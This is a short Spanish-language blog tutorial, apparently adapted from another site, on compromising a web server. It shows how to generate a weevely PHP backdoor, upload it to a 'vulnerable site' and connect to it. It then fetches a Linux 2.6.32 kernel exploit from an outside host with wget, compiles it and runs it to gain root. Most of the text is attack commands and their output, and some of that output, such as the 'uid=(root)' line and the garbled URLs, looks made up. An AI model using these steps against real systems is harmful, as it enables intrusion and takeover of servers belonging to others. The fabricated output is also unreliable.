Hace poco conoci una herramienta weevely , una herramienta muy buena para cambiar el antiguo netcat este tutorial no es mio. fue tomado de otra pagina.. pero lo edite y  quiero compartirlo con ustedes.

luego de subir el backdoor generado con weevely. sino lo ha generado usamos el comando en Backbox es:

weevely generate (nombre y ubicacion de backdoor)  (pass)

ej:

weevely generate  /dylan/backdoor.php backdoor

se ha generado en mi carpeta personal /dylan/backdoor.php

luego de subirla a el site vulnerable.. entonces ahora conectamos la backdoor usamos el comando.

weevely htpp://target.com/uploads/backdoor.php backdoor

nos vizualizara algo como esto:

———————————————————————————————-

________                      __
|  |  |  |—–.—-.-.–.—-’  |–.–.
|  |  |  |  -__| -__| |  | -__|  |  |  |
|________|_____|____|___/|____|__|___  | v0.7.1
|_____|
Stealth tiny web shell

[+] Starting terminal, shell probe may take a while
[+] List modules with <tab> and show help with :show [module name]

user@ServidorVulnerable : /home/user/public_html/uploads/

———————————————————————————————-

ejecutamos el comando uname -r -s

Linux 2.6.32 kernel

conociendo ahora el kernel crearemos una carpeta llamada /tmp

mkdir tmp

cd tmp

y ahora descargaremos el exploit para el kernel.

[user@ServidorVulnerable/tmp/]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete —————–100% ———- 2.6.32.c
[user@ServidorVulnerable/tmp] ls
2.6.32.c
Directory Successfully listed.
[user@ServidorVulnerable/tmp] gcc 2.6.32.c -o hackall
-
-
done
[user@ServidorVulnerable/tmp] ./hackall
-
-

[user@ServidorVulnerable/tmp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp] Root Complete!!

 

Y asi hemos completado el root. :)

Feliz HappyHacking!

Acerca de Mi Dylan Irzi

Colombiano, WebMaster, Independent Security Researcher , Apasionado por la Seguridad Informatica, #WhiteHat. Programador. Co-Fundador y Dueño de WebSecurityDev.com